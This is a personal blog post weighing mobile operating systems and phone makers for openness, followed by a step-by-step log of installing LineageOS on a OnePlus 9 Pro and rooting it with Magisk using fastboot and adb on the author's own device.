After many years of being the goto android-variant mobile OS for non-conformists, sadly [CyanogenMod](https://en.wikipedia.org/wiki/CyanogenMod) imploded in 2016. The code lives on in LineageOS (see below).
#### Promising futures
Two currently active non-android physical phone projects, and several more ongoing Linux based (i.e. non-android) mobile-friendly operating system efforts. Although these will never cross the radar of most people (just like Linux didn't for many years) these are important foundational projects.
##### Purism's Librem 5 phone hardware running PureOS (Linux)
* [Librem 5 phone](https://shop.puri.sm/shop/librem-5/)
* [PureOS](https://pureos.net/)
The [Librem 5](https://shop.puri.sm/shop/librem-5/) is worth a look if you want to take it to the next level of openness, however it comes with a compromise in specifications, a hefty price tag (inevitable due to lower production volumes) and no android / iOS apps.
You might however want to consider spending your dollars as a vote for the future you want to see.
The [Librem 5 runs Linux (PureOS), not Android](https://puri.sm/products/librem-5/pureos-mobile/). This is great but as of 2021 does mean it suffers from the "app" problem (see above).
Because of the "app" problem I'm not ready to make the jump to a Linux based smartphone that can't run android apps. I'm also not particularly keen to drop quite this much in specification for the benefit.
Personally I'm happy with the OnePlus compromise of specification plus apps versus openness for now, but I'm very glad to see Purism pushing the frontier of openness and maybe I'll join their users one day.
##### PinePhone Pro phone hardware (Linux, for now)
The [PinePhone Pro](https://www.pine64.org/pinephonepro/) is a low spec but very open Linux phone. A follow up to the original PinePhone.
"pre-orders from developers on October 15, 2021, and expect to have them delivered by December"
Phones like this are important in building momentum in the capability of non iOS/Android software even though they will never be mainstream phones themselves.
This is a Linux phone, though in theory [GloDroid](https://glodroid.github.io/) will provide a build of Android (AOSP) for it, but don't hold your breath. - [OmgUbuntu article on PinePhone+GloDroid](https://www.omgubuntu.co.uk/2020/07/glodroid-android-for-pinephone-allwinner).
##### UBPorts Ubuntu Phone (Linux)
Canonical killed the Ubuntu Phone and the [Ubuntu Touch](https://en.wikipedia.org/wiki/Ubuntu_Touch) operating system, but the software lives on in [ubports](https://ubports.com/). (Presumably that's short for UBuntu Ports)
##### Plasma (Linux KDE for phones)
[Plasma Mobile](https://plasma-mobile.org/) is a variant of the KDE Plasma desktop specifically for mobiles.
Learn more about [Plasma on Wikipedia](https://en.wikipedia.org/wiki/Plasma_Mobile)
##### Mobian - (Debian Linux for phones)
[Mobian](https://mobian-project.org/) is encouraging to see. Debian Linux's strength has always been its governance and stability. Debian has been a rock in the stormy seas of open source even as different people have passed through its team. This is because debian has a strong set of organisational rules that are above and beyond any individual contributor. The fact that they are working on a mobile variant is very encouraging.
##### PostmarketOS (Linux)
[PostmarketOS](https://postmarketos.org/) is an Alpine Linux (i.e. very small) variation designed to breathe life into otherwise obsolete hardware. I expect this will become more useful as phone hardware stops becoming utterly obsolete due to major changes in basic expectations and environment.
## Secure boot
There's the secure boot chain and device locking. This can be a good thing or a bad thing depending on the power dynamic between users and providers (and maybe even the state/government).
It is true that your device is less "secure" with the bootloader unlocked (as the phone likes to scream at you every time you boot it up), at least to attackers with physical access to your device, however I think that's worth the trade for full control of your device (that you paid for and "own").
[Security is not an absolute](https://www.isaca.org/resources/isaca-journal/issues/2021/volume-6/evidence-based-prioritization-of-cybersecurity-threats). You have to consider cost, inconvenience, human behaviour, the value of an attack target, the motivations of different actors (state, organised crime, hackers, opportunist thieves, trolling friends etc). For me an encrypted data partition and a passcode will do for physical security. In theory you can get full secure boot chain for custom operating systems but even on a Linux laptop this is non-trivial currently.
There's an important difference here between google/apple considering the security of their entire device eco-system in the hands of every kind of user, and the security of an individual's device customised to suit them. If google turn off secure boot for everyone then it makes it that much more likely that someone will successfully develop and spread an android virus that corrupts the boot chain. If I turn it off it's a rounding error on the probability, and a marginal difference to the "security" of my own device.
### Apple's secure boot chain
Apple don't want you to fiddle with the OS they control, so you don't get to touch it without "jailbreaking" it. Jailbreaking is done by exploiting a security flaw, and it's a cat and mouse game with Apple fixing bugs to close holes and hackers finding new ones to regain control of the devices. Not a game I want to play just to have control over my own hardware. This 100% rules out iOS for me, it's a complete dealbreaker. No matter how shiny, how bug free, how capable it is I wouldn't trade unless there was absolutely no alternative.
### Android's secure boot chain
Android also secure their boot chain by default, however whether you can unlock it and flash a different recovery/bootloader/OS/ROM depends on the phone manufacturer, individual device, and sometimes the phone network provider (aka locking/unlocking).
This means choose your device and provider carefully if you wish to unlock without wasting your time trying to jailbreak a locked device.
### Artificial app limitations when unlocked
Android has a system that allows apps to hide or limit functionality called [SafetyNet](https://www.lineageos.org/Safetynet/). For apps like NetFlix that won't even show in the play store for unlocked phones we're into the mega-discussion that is [DRM](https://en.wikipedia.org/wiki/Digital_rights_management). In short if a content creator wants to lock their device to a locked-down platform that's fine by me but I won't be using those platforms for my main computing, instead I might have them as throw-away additional appliances like the google chromecast, or samsung TV's built in junk. What really matters here is what alternatives you have available to you. For google pay, I'm very slightly sad to miss out but my contactless debit card still works fine so I'll live.
## Hardware choices
Given the "app" problem, any devices not capable of running Android or a derivative are currently out of the running (sad times).
A non-negotiable for me is manufacturer support for replacing the bootloader and everything above that (OS, apps). This ensures the life of the device beyond the point at which the manufacturer loses interest or does something horrific/stupid. This is also a signal for who is truly in charge of the device once it's "yours" - you the user or the supplier and their developers. By locking you out of making modifications it's a clear signal that you are not to be trusted with the power over your own device.
As the useful innovation in hardware slows down (2G to 3G was a big jump, but 8-megapixel cameras to 32-megapixel cameras is less foundational) it will be less often that devices will become obsolete through huge leaps in capability. It will also mean that phone hardware will inevitably become more commodity and less proprietary, giving a chance for more open standards to get a foothold (just as x86 replaced proprietary CPU architectures many decades ago), while still being acceptably capable. We shouldn't be throwing out devices because the manufacturer decided not to provide security patches for their OS variant, and certainly not because the manufacturer took away a feature we like through forced updates.
### Google Nexus / Pixel (meh)
I have run a [google nexus](https://en.wikipedia.org/wiki/Google_phone) 4 previously which was flashable and rootable, but long since obsolete in hardware capabilities (and suffered a hardware failure). I never looked back at the google line after I discovered OnePlus, I can't comment on whether the current pixel phones are a good device for my constraints. I don't particularly want to further feed the beast. If you want the authentic pure google experience I guess these are probably worth a look but the pure google experience seems less and less appealing as the years roll on.
### Sony (yuck)
Someone told me that a particular Sony phone was flashable, I researched it, found instructions on flashing it, ordered one... and couldn't flash it. Discussing with Sony support it transpired that that precise model was sometimes flashable and sometimes not, and the only way to find out was to order one and look at the serial number. Fuck you Sony. They never have understood the open source movement and look like they still don't. They always treated their kit like appliances not a blend of hardware and software (or firmware) with everything that means for the long term management of the software. It's a shame because they do make nice hardware. I'd still buy a dumb Sony audio amplifier but not much else of theirs. Returned and refunded, try again...
### OnePlus (yay, no wait, boo)
This is my choice for the new [OnePlus 9 Pro](https://www.oneplus.com/uk/9-pro) I'm trying to set up, and the [OnePlus 5T](https://www.oneplus.com/uk/support/spec/oneplus-5t) I've been using for more than a couple of years now.
They don't make the grade for the pure "everything must be open including chip bytecode and chip architecture" as they use proprietary chips, but they make the right balance for me of reasonably high spec hardware for a reasonable price, android compatibility, and the ability to flash whatever ROM/OS you like (at your own risk).
I've been running a OnePlus 5t for a while now (bought outright, no network lockin or contract nonsense) and generally happy enough with it. There are some bugs and storage is starting to constrain hence the upgrade, plus the camera could be better by modern standards and I don't fancy carrying a separate camera.
I now have had the OnePlus 9 Pro sat in a drawer for two months waiting for me to figure out what-the-[FSM](https://en.wikipedia.org/wiki/Flying_Spaghetti_Monster) to run on it, hence this blog post. It's already been unlocked and I've tried flashing a couple of things but am not happy with the setup yet. I stopped looking at it while I concentrated all my efforts on making sure my business was going in the right direction (or any direction at all).
> To get root you have to wipe the phone
The OnePlus comes with OxygenOS (an android derivative) preinstalled, but not rooted and with a locked bootloader. To get root you have to wipe the phone which means it's important to do it before you start using it. It's caused me no end of pain that you can't use [titanium backup](https://www.titaniumtrack.com/titanium-backup.html) to backup all your data without root, and you can't get root without losing your files. I understand why (so you can't just unlock a phone to steal all the data) but that doesn't make it less of a pain in the arse. Bonus points for operating system updates (over the air / OTA or just normal updates) de-root the phone.
[XDA Developers detailed page on the OnePlus 9 including pro](https://www.xda-developers.com/oneplus-9/)
---
But wait, there's trouble in paradise.
The founder [<NAME> left OnePlus in 2020](https://techcrunch.com/2020/10/16/oneplus-co-founder-carl-pei-confirms-he-has-left-the-company/) after 7 years at the company.
[OnePlus was funded by an existing phone company called Oppo](https://www.androidauthority.com/oneplus-oppo-design-894687/). (And [both OnePlus and Oppo are part of BBK](https://www.androidauthority.com/oneplus-oppo-1177898/))
It seems that [OnePlus is basically now dead in the water](https://www.androidauthority.com/oneplus-oppo-complete-opinion-3025477/) as a brand if not a company in its own right and will be sucked back into whatever the mothership has to offer, breaking everything along the way by trying to merge Oppo's colorOS with OnePlus's OxygenOS into an unholy mess.
Fuck.
---
As if that wasn't enough:
> "OnePlus is adding artificial limitations and breaking features via software updates, and there are no indications that they'll improve." ~ GCam Hub, <https://www.celsoazevedo.com/files/android/google-camera/f/post-05/>
---
It turns out that the founder of OnePlus, <NAME>, has set up a new company called "[Nothing](https://nothing.tech/)" (enjoy googling that one), which did just make headphones (unexciting), but who have just announced a phone. So maybe this is the true successor to the likely dead OnePlus brand. <https://www.theverge.com/2022/3/23/22992424/nothing-phone-1-smartphone-carl-pei-apple-ecosystem>
## So what OS options does that leave?
So not iOS and preferably not Android either.
Unfortunately the apps mean that I'm stuck with Android and its derivatives for the time being.
It seems the best hope for salvation is the Linux based options discussed above eventually getting sufficient app coverage to make the jump more bearable, or maybe even some kind of android emulation allowing them to run android apps sufficiently well. The path from Windows to Linux for me included a mix of dual-boot, virtualization and wine (an api compatibility layer, not an emulator)
It's worth mentioning that some (most/all?) phone manufacturers make proprietary customizations to Android or even complete [forks](https://en.wikipedia.org/wiki/Fork_(software_development)) that you may or may not want. Samsung for example (for the Galaxy line of phones) replaces the "launcher" with the ["Samsung Experience"](https://en.wikipedia.org/wiki/Samsung_Experience). I'm going for more open rather than less, so I'm not interested in trading slickness for losing even more control. I just want a platform that runs the apps I care about and is as open as possible.
### Researching the options
I don't follow this stuff all the time so I had to do some googling ([duckduckgo](https://duckduckgo.com/)-ing). Here's some useful comparisons I turned up:
* [It's FOSS, Open Source Mobile OS Alternatives To Android](https://itsfoss.com/open-source-alternatives-android/) - mostly pure Linux things that don't have the android app ecosystem
* [PC Magazine, Break Away From Android: 7 Free Open-Source Mobile OSes to Try](https://uk.pcmag.com/linux/131295/break-away-from-android-7-free-open-source-mobile-oses-to-try)
* [GetDroidTips has some more ROMs I haven't looked at](https://www.getdroidtips.com/best-custom-rom-oneplus-9-pro/)
I've got more to learn/research here so I'll expand this section as and when I learn more. Think of this as a [bliki](https://www.webopedia.com/definitions/bliki/). There's a full history in git (link at end).
### Towering stacks of patches
The below are probably the most realistic alternatives to stock Android and iOS for those who want more openness but don't want to give up all the modern conveniences in the name of openness and/or privacy. They are however all customizations of Android and that brings a very real problem.
The core open "Android Open Source Project (AOSP)" is run by google for google's benefit and for their own Android ecosystem. There is significant engineering effort continually poured in to this, with major releases made on remarkably short timelines.
Any project that makes a customization to AOSP such as LineageOS and keeps track of it in their own fork is constantly at the mercy of changes to the foundation it has been based on, a foundation which really has no reason to care about them.
This creates a never ending challenge that stunts innovation outside the Android/iOS duopoly. If you build a significant customization, it will sooner or later be broken and need re-engineering because of changes in AOSP, or maybe even be impossible to resurrect. The more you innovate and customize, the more engineering fire-power is required just to stand still on the treadmill of change in the platform.
While we have good tools for managing all this complexity (git, gerrit) this is a fundamental and unavoidable problem with building on a platform that doesn't care about you.
Contrast that with the Linux ecosystem where the platforms people are building on (consisting of many many layers and teams) are much more interested in supporting downstream projects and allowing choice. Projects that run on Linux can often run with minimal modification for decades. Linux is also not built for the benefit of some particular vendor like google with their own agenda, it is instead run by a foundation with far more broad interests and pressures.
### Android derivative options
I now need to look into the below and decide what to run (maybe with some trial flashing). Once that's done it'll be on to the slog of setting up the actual device how I want it.
#### OxygenOS from OnePlus - used to be good, now dying a painful death
See the section on OnePlus hardware above. The company and OS are in trouble now the founder has left and the operating system has been merged with Oppo's colorOS (read "fucked")
* <https://www.oneplus.com/uk/oxygenos>
This is the default for the OnePlus device I have, which means it's the most likely to make the hardware perform at its best.
After a [wobble on data reporting](https://www.theverge.com/circuitbreaker/2017/10/11/16457954/oneplus-phones-collecting-sensitive-data) (which I'm not too bothered about) they seem to have largely sorted out their privacy game... apart from being full of google services just like the rest of the mainstream android devices. To play or not to play...
Here's [the original article disclosing OnePlus silently sending data home](https://www.chrisdcmoore.co.uk/post/oneplus-analytics/).
It seems the latest news is that Oxygen is falling apart. [XDA Developers: "OxygenOS 12 for the OnePlus 9 series is littered with bugs"](https://www.xda-developers.com/oneplus-9-oxygenos-12-stable-update-bugs/)
> "It was shit after merge with #Oppo and getting worst day by day. I really like #OnePlus device but #OxygenOS is dead now." ~ [@rahulawanjari, 9 Dec 2021, twitter](https://twitter.com/rahulawanjari/status/1468885793691168771?s=20)
Crap, there goes another good option. As if the mobile phone space wasn't horrific enough already.
In fact OxygenOS 12 was so bad, that they've just [OnePlus pulled the plug on the entire OxygenOS 12 upgrade!!](https://www.androidpolice.com/oneplus-is-pulling-its-oxygenos-12-update-for-the-op-9-and-9-pro/)
Bonus points for the anti-competitive practice of [actively denying access to hardware features (secondary cameras)](https://www.gizmochina.com/2021/12/13/oxygenos-12-blocks-access-to-auxiliary-cameras-on-third-party-camera-apps/). I hope the courts slap them down for this clearly anti-competitive behaviour.
---
So after discovering that shit-show-in-paradise from OnePlus I could potentially skip OxygenOS 12 and stick to the less f*cked OxygenOS 11, but that doesn't seem like much of a plan so it looks like I'll be skipping any fancy hardware capability and looking for a more open and less broken Android variant. Yet more proof that corporations can't be trusted as guardians of our software for the long term without GPL or at least MIT to stop them from hurting their users sooner or later. Did I mention my podcast is called "Software Should Be Free". Does this horror show give you a hint as to why it's called that?
#### LineageOS (yep)
[LineageOS](https://lineageos.org/) is the successor to the now defunct CyanogenMod. [See the history of LineageOS and its relationship to CyanogenMod here on Wikipedia](https://en.wikipedia.org/wiki/LineageOS).
CyanogenMod was a bastion of freedom and innovation. I hope Lineage has managed to continue that.
There does appear to be [a build of LineageOS for the OnePlus 9 pro](https://download.lineageos.org/lemonadep) - I think this is worth trying out.
LineageOS has its own recovery image, so no need to run TWRP as well.
[Review of LineageOS on XDA Developers](https://www.xda-developers.com/lineageos-18-1-review/)
#### Lineage for microG (maybe?)
* <https://lineage.microg.org/>
* <https://github.com/lineageos4microg>
This is a fork of lineage with microG already set up properly and a patch that lineage wouldn't allow that lets them spoof google signatures in order to trick apps into believing they are using the real google play services.
> Q: "Why do we need a custom build of LineageOS to have microG? Can't I install microG on the official LineageOS?"
>
> A: "MicroG requires a patch called "signature spoofing", which allows the microG's apps to spoof themselves as Google Apps. LineageOS' developers refused (multiple times) to include the patch, forcing us to fork their project."
> ~ [Lineage for microG faq](https://lineage.microg.org/#faq)
#### Replicant (not yet)
"[Replicant](https://replicant.us/) is a fully free Android distribution running on several devices"
I'm glad this freedom is here but I'm not quite ready to give up every last proprietary thing until there's a bit less of a gap.
[Supported devices](https://redmine.replicant.us/projects/replicant/wiki#Supported-devices) shows purely Samsung Galaxy devices currently.
#### /e/ (aka Eelo)
<https://e.foundation/>
> "We build desirable, open source, privacy-enabled smartphone operating systems."
This Android derivative is focussed on privacy; eliminating as much data collection (i.e. all things google) as possible. Laudable but not my main focus right now.
You can buy their reconditioned phones with their OS pre-installed or just install the OS on something else.
They provide their own alternative cloud hosting for contacts etc for reasonable prices.
Their dev build has a root option it seems which might be useful. - <https://doc.e.foundation/support-topics/root-e-os.html>
* [/e/ on wikipedia](https://en.wikipedia.org/wiki//e/_(operating_system))
* [itsfoss.com/eelo-mobile-os](https://itsfoss.com/eelo-mobile-os/)
* <https://www.pcmag.com/news/google-free-android-smartphones-are-now-available-in-the-us>
#### GrapheneOS (nope)
> "[GrapheneOS](https://grapheneos.org/) - The private and secure mobile operating system with Android app compatibility. Developed as a non-profit open source project."
[GrapheneOS only officially supports Pixel phones](https://grapheneos.org/faq#supported-devices)
#### CalyxOS (nope)
> [CalyxOS](https://calyxos.org/) - "Your Phone Should Be Private Everyone needs a phone. Not everyone wants to be spied on. Reclaim your privacy with CalyxOS."
Supports Pixel devices and one Xiaomi phone (never heard of it).
Seems to be pushing Signal and Tor so is super-privacy focussed.
## Google Apps and Services
There are two major parts to this:
1. Google play - the app store for downloading apk files to install (plus ratings, reviews, screenshots etc)
2. Google services - these provide services that many apps want to use to avoid multiple implementations such as location information, push notification etc.
There's a few ways of getting the google play store and related proprietary horrors:
* Open GApps - pulls down the proprietary apps and writes them to the image
* MindTheGapps? - pulls down the proprietary apps and writes them to the image
* microG - open source re-implementation of the services
[For Lineage 18.1 (Android 11) the Lineage wiki links to MindTheGapps](https://wiki.lineageos.org/gapps#mobile), and [XDA Developers says "Always Use the GApps Package Recommended by your ROM Developer"](https://www.xda-developers.com/gapps-package-recommended-rom-developer/)
I don't mind proprietary software as long as there's choice out there, and the apple app store + google play duopoly on apps is not choice. F-Droid is fine but doesn't have a single big name vendor's apps, so it's probably enough for google to dodge an anti-competitive lawsuit but not enough to produce any real competition.
Comparisons:
* <https://www.reddit.com/r/LineageOS/comments/8358p0/mindthegapps_vs_opengapps/>
* <https://www.reddit.com/r/degoogle/comments/olsv4c/i_am_very_confused_by_opengapps_mindthegapps/>
### Open GApps (installer)
Installer for google's proprietary services.
* GApps <https://wiki.lineageos.org/gapps>
* <https://github.com/opengapps/opengapps>
* <https://opengapps.org/>
Q: Why is this such a pain? A: Licensing...
> "Due to licensing restrictions, these apps do not come pre-installed with ROMs others than those from vendors that are part of the [Open Handset Alliance](http://www.openhandsetalliance.com/index.html) and must be installed as a sideload package by the user themselves." ~ <https://github.com/opengapps/opengapps/wiki/FAQ>
We're lucky they let us do this at all, google could take their toys away from us at any time.
For Open GApps pico looks sufficient <https://github.com/opengapps/opengapps/wiki/Package-Comparison>, Lineage recommends nano and no bigger.
### MindTheGapps (installer)
Installer for google's proprietary services.
Really haven't found much information about this.
#### About
* <https://gitlab.com/MindTheGapps/vendor_gapps> - I think this is probably the official source
* There's no download link, as mentioned in this issue: <https://gitlab.com/MindTheGapps/vendor_gapps/-/issues/1>
* <https://github.com/MindTheGapps/vendor_gapps> appears to be a stale copy, maybe they moved hosting to gitlab
* <https://www.getdroidtips.com/mindthegapps-8-1-0/>
* <https://forum.xda-developers.com/t/change-opengapps-for-mindthegapps-afterthought.3837816/>
#### Installation
* This wasn't a lot of help but basically said just flash it: <https://www.getdroidtips.com/mindthegapps-8-1-0/>
### microG (open source reimplementation)
<https://github.com/microg>
A free software implementation of shared services provided by the proprietary google services (such as location and push messaging used by many apps).
Doesn't work properly when flashed to lineage according to the faq so they made their own fork of Lineage "Lineage for microG" (see above)
### Aurora - play store proxy
Download apks (installation files) from the google play store without any googleness.
* <https://aurora-store.en.uptodown.com/android>
* <https://f-droid.org/packages/com.aurora.store/>
### Yalp - play store proxy
<https://yalp-store.en.uptodown.com/android>
### F-Droid app store
[F-Droid](https://f-droid.org/) is an app store for android like google play but without all the googlyness.
This is a bit pointless if you install play because all the open source apps are available in both, and the closed ones are only in play. I think I'll skip this for now but I'm glad it exists... Though it is pre-installed in lineage-for-microG so I have poked around and installed a few things.
### Playmaker - play store / f-droid integration
<https://github.com/NoMore201/playmaker>
## Recovery images
### TWRP (great but not needed)
Previously I've used TWRP, and I got as far as flashing it before discovering [Lineage has its own recovery image](https://www.xda-developers.com/lineageos-18-1-review/)
* Unlock bootloader <https://www.getdroidtips.com/oneplus-9-pro-unlock-bootloader/>
* Download TWRP for lemonadep <https://twrp.me/oneplus/oneplus9pro.html> - [3.6 twrp download for lemonadep](https://eu.dl.twrp.me/lemonadep/twrp-3.6.0_11-0-lemonadep.img.html)
* Get twrp public gpg/pgp public key to be able to verify `.asc` files <https://twrp.me/faq/pgpkeys.html>
* Flash TWRP (TeamWin Recovery Project?) <https://twrp.me/>
* Power off the phone
* Hold down volume-down and power buttons
* Select english
* select reboot to fastboot
* connect the usb cable (usb-c to usb-c doesn't work on my dell xps, use the bigger usb 3 A to usb-c cable)
* run `fastboot devices` on the laptop (connected over usb), you should see your phone listed
* boot the phone from the local twrp image `fastboot boot twrp-3.6.0_11-0-lemonadep.img`, phone boots up into twrp gui
* advanced > flash current twrp
* there's a note about bootloops, but the options isn't there so skipping that
* reboot > power off (says current slot: A, just for the record)
* power on with volume-down held again, boots straight to twrp this time
### LineageOS's recovery image
Came across this here: <https://www.xda-developers.com/lineageos-18-1-review/>
Works well, flashed no problem and have used both recovery and fastboot modes with no issues. You'll see it as part of the steps below.
## Installing LineageOS on OnePlus 9 Pro (take 1)
It begins. [LineageOS](https://lineageos.org/).
The oneplus 9 pro device is codename `lemonadep`.
Useful howtos:
* [LineageOS official installation wiki page for OnePlus 9 pro lemonadep](https://wiki.lineageos.org/devices/lemonadep/install)
* [How-To Geek: How to Install LineageOS on Android](https://www.howtogeek.com/348545/how-to-install-lineageos-on-android/)
* [Android Authority: Beginner’s guide to installing LineageOS on your Android device](https://www.androidauthority.com/lineageos-install-guide-893303/) - lots more context and screenshots
* [LineageOSROMS (unofficial)](https://lineageosroms.com/install-lineageos/) - a very short 8 step guide
* [LineageOSROMS (unofficial) full guide](https://lineageosroms.com/lemonadep/)
* [GetDroidTips](https://www.getdroidtips.com/lineage-os-18-1-oneplus-9-9-pro/) - not sure there's much extra useful here
[XDADevelopers coverage of Lineage support for OnePlus 9 pro](https://www.xda-developers.com/lineageos-18-builds-oneplus-9-pro-razer-phone-2-lenovo-p2/)
The steps:
* Download latest nightly (there's no stable/unstable on this): <https://download.lineageos.org/lemonadep> - this has both the ROM (OS image) and the recovery image.
* Download copy-partitions <https://androidfilehost.com/?fid=2188818919693768129> (as per wiki)
* The sha256 for the copy I have is `200877dfd0869a0e628955b807705765a91e34dff3bfeca9f828e916346aa85f copy-partitions-20210323_1922.zip`
* Verify all the sha256 sums: `sha256sum -c *.sha256`
* Boot to fastboot
* flash the lineage recovery:
```
tim@max:~/Downloads/oneplus9pro/LineageOS
$ fastboot flash boot lineage-18.1-20211214-recovery-lemonadep.img
Sending 'boot_a' (196608 KB) OKAY [ 6.113s]
Writing 'boot_a' OKAY [ 0.655s]
Finished. Total time: 6.985s
```
* copy partitions as instructed
* boot into recovery (vol-down + power)
* "apply update" > "apply from adb" (aka sideload)
* `adb sideload copy-partitions-20210323_1922.zip`
* Ignore unknown sig and "continue"
* wipe
* boot into recovery (vol-down + power) if not already in it
* "format data / factory reset"
* OS install
* boot into recovery (vol-down + power) if not already in it
* "apply update" > "apply from adb" (aka sideload)
```
tim@max:~/Downloads/oneplus9pro/LineageOS
$ adb sideload lineage-18.1-20211214-nightly-lemonadep-signed.zip
serving: 'lineage-18.1-20211214-nightly-lemonadep-signed.zip' (~47%)
adb: failed to read command: Success
```
apparently this is normal, but the failed to flash error on the phone is not, and rebooting drops me back into the existing Oxygen install. Dammit.... Try again
* Second attempt ran fine
* output: `step 1/2`
* output: `step 2/2`
* then recovery logo comes back up and it just sits there
* volume up to the back arrow at the top, power to press it
* *then* it says "`install complete with status 0`" (zero being unix-speak for no-issues)
* but it doesn't ever get past the lineage logo when booting, maybe because of the boot of oxygen. hmm
* [hard-power-off](https://www.youtube.com/watch?v=y2yB2dRrXiA) by holding down volume-up and power button
* take 3,
* back to recovery
* re-wipe (factory reset)
* reboot
* this time it booted... briefly
* it got to setup screen, then before I did anything rebooted into some kind of recovery failsafe and prompted to factory reset again, which I did. This time it rebooted and stayed up while I zipped through the wizard.
* go take a look - ignore the warning about doing gapps etc first just so we can see what vanilla Lineage looks like. We can always wipe & reflash
* wonderfully empty app list!
* basic main camera & selfie cam works
* flashlight works
* odd android verify notification, didn't seem to work
* top shelf only available on lockscreen, odd
* no sim yet and wifi not connected yet, so not much else to test
* vol-down + power still takes screenshots
### Connect adb, see if we get root shell
<https://developer.android.com/studio/command-line/adb#Enabling>
* On the phone enable adb
* settings > about phone > tap "build number" repeatedly
* settings > system > advanced (grrrr) > developer options
* usb debugging [on]
* rooted debugging [on]
* disable adb authorization timeout [on]
* connect usb cable to laptop
* phone prompts "Allow USB Debugging?"
* tick "always allow"
* press "allow"
* On the laptop `adb devices` should now show the phone
Success with non-root:
```
$ adb shell
OnePlus9Pro:/ $ ^D
```
Root denied without flipping the "rooted" option:
```
$ adb root
ADB Root access is disabled by system setting - enable in Settings -> System -> Developer options
```
After enabling rooted debugging as above:
```
$ adb root
restarting adbd as root
$ adb shell
OnePlus9Pro:/ # whoami
root
```
### Getting root back
#### Grumble
It really annoys me that on a laptop this isn't even a step, yet on Android this is a whole additional drama. But I may have already mentioned that. Understanding the reasons doesn't mean I have to like it.
#### adb root shell
According to <https://www.xda-developers.com/lineageos-dropping-superuser-addonsu-implementation-favor-magisk-manager/> adb root shell is the official LineageOS way of getting root access to "mess with important files".
```
$ adb root
restarting adbd as root
$ adb shell
OnePlus9Pro:/ # whoami
root
```
Worth knowing but not much help for running titanium backup as root.
#### Magisk
According to <https://www.xda-developers.com/lineageos-dropping-superuser-addonsu-implementation-favor-magisk-manager/> Magisk is the only real option now. I guess SuperSU still works but lacks the masking that allows you to fool android pay etc.
##### ⚠️ Beware of fake Magisk sites !! ⚠️
Github is the official home for Magisk and its downloads: <https://github.com/topjohnwu/Magisk>
[**Beware of clone sites**](https://www.xda-developers.com/psa-magiskmanager-com-not-official-website-magisk/amp/) especially ones offering downloads. `MagiskManager.com` is not legit or authorised and may host malware at some point. I've seen a few others too. They look like SEO optimised clones that could potentially be feeding some or all visitors malware.
It's worth being extra-careful with things like recovery images and rooters because by definition they have full control of your device, malicious or malign.
##### Magisk root install
LineageOS said not to boot before installing GApps, I'm not sure if that applies to Magisk too. I already have booted up. Not sure if a factory reset plus wipe will be enough or whether the image will have to be reflashed. I'll try with just an install, if that doesn't work I'll try the reset and see what happens, and if *that* doesn't work I'll try a full reinstall.
* Look at readme at <https://github.com/topjohnwu/Magisk>
* Follow instructions <https://topjohnwu.github.io/Magisk/install.html>
* Download latest release <https://github.com/topjohnwu/Magisk/releases/latest>
* install the app with adb (with the phone on, and booted to LineageOS as per normal use)
* <https://www.droidviews.com/install-apk-files-using-adb-commands/>
```
$ adb install Magisk-v23.0.apk
Performing Streamed Install
Success
```
* On the phone, swipe up for the full app list (drawer), and there is a Magisk icon!
###### Getting boot.img
The instructions for Magisk just say you need `boot.img`, leaving no clues about how to get it. [I've proposed explaining how to extract them in this pull request](https://github.com/topjohnwu/Magisk/pull/5132)
It turns out it's embedded in the Lineage system image `lineage-18.1-20211214-nightly-lemonadep-signed.zip` that we've already downloaded.
There's another payload extractor with easier dependencies that's worth a try, especially if you don't already have python: [payload-dumper-go](https://github.com/ssut/payload-dumper-go)
[payload-dumper-go downloads](https://github.com/ssut/payload-dumper-go/releases/latest). I've now tested this and it works great. You don't even have to unzip the zip.
Extract the `payload.bin` file from the `lineage-18.1-20211214-nightly-lemonadep-signed.zip` to the same folder as the python script.
Some instructions on using python to extract the boot image: <https://forum.xda-developers.com/t/guide-how-to-extract-payload-bin-from-ota.3830962/> (ignore the file it's older than the github one)
The `payload_dumper` file appears to be from <https://github.com/vm03/payload_dumper> assuming my googling is accurate.
I didn't need to do the pip install.
I did change the python to python3 at the top of the py file and make it executable.
```
tim@max:~/Downloads/oneplus9pro/payload_dumper
$ ./payload_dumper.py payload.bin
boot
dtbo
odm
product
system
system_ext
vbmeta
vbmeta_system
vendor
vendor_boot
tim@max:~/Downloads/oneplus9pro/payload_dumper
$ ll output
total 5.6G
-rw-rw-r-- 1 tim tim 192M Dec 20 23:20 boot.img
-rw-rw-r-- 1 tim tim 24M Dec 20 23:20 dtbo.img
-rw-rw-r-- 1 tim tim 2.8M Dec 20 23:20 odm.img
-rw-rw-r-- 1 tim tim 1.3G Dec 20 23:21 product.img
-rw-rw-r-- 1 tim tim 267M Dec 20 23:21 system_ext.img
-rw-rw-r-- 1 tim tim 2.5G Dec 20 23:21 system.img
-rw-rw-r-- 1 tim tim 8.0K Dec 20 23:21 vbmeta.img
-rw-rw-r-- 1 tim tim 4.0K Dec 20 23:21 vbmeta_system.img
-rw-rw-r-- 1 tim tim 192M Dec 20 23:22 vendor_boot.img
-rw-rw-r-- 1 tim tim 1.3G Dec 20 23:22 vendor.img
```
Hurrah, now we have a `boot.img` to give to Magisk.
###### Magisk rooting
Copy the `boot.img` across:
```
tim@max:~/Downloads/oneplus9pro/payload_dumper
$ adb push output/boot.img /sdcard/
output/boot.img: 1 file pushed, 0 skipped. 177.5 MB/s (201326592 bytes in 1.082s)
```
* Press install on the Magisk app.
* "Select and Patch a File"
* hamburger in file browser > "OnePlus 9 Pro" (obviously, duh) > `boot.img`
* "let's go ->"
* Magisk shows steps then "output file is written to..." and a path to download folder
```
tim@max:~/Downloads/oneplus9pro/payload_dumper
$ adb shell
OnePlus9Pro:/ # ls -lh /sdcard/Download/
total 96M
-rwx------ 1 u0_a163 u0_a163 192M 2021-12-14 13:21 magisk_patched-23000_BYMDt.img
```
* pull the file back to the laptop `adb pull /sdcard/Download/magisk_patched-23000_BYMDt.img`
* Now flash the file to the phone:
* (the vol-up + power didn't work for me, just did a normal boot, vol-down + power is recovery not fastboot)
* Settings > system > advanced (ffs) > gestures (wtf?) > power menu > advanced restart [on]
* power button (hold) > power > restart > fastboot
```
tim@max:~/Downloads/oneplus9pro/payload_dumper
$ fastboot flash boot magisk_patched-23000_BYMDt.img
Sending 'boot_b' (196608 KB) OKAY [ 6.035s]
Writing 'boot_b' OKAY [ 0.639s]
Finished. Total time: 6.853s
```
* power off
* power on
* open up the Magisk app - it shows installed version number now, hurrah
Using Magisk:
* Click the cog (top right) to optionally turn on "MagiskHide"
* Along the bottom are four icons
* Home
* Shield - shows root requests
* bug - shows logs
* jigsaw piece - shows modules, activate, deactivate & install
### adb
